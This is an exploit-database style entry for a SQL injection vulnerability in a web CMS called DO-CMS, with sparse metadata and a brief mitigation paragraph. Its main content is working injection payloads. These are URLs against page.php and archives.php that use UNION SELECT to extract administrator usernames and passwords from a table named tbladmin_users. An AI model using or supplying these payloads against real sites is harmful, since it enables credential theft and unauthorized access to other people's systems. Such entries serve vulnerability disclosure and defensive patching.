vendor:
DO-CMS
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: DO-CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown
DO-CMS Multiple Sql Injection Vulnerability
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter in the URL. For example, www.site.com/page.php?pid=null[Sql] and www.site.com/archives.php?pid=null[Sql]. An attacker can also use the UNION operator to retrieve data from the database. For example, www.site.com/page.php?pid=null+and+1=2+union+select+concat(username,0x3a,psword)+from+tbladmin_users and www.site.com/archives.php?pid=null+and+1=2+union+select+1,2,3,concat(username,0x3a,psword),5,6,7,8,9,10,11+from+tbladmin_users
Mitigation:
Developers should ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.
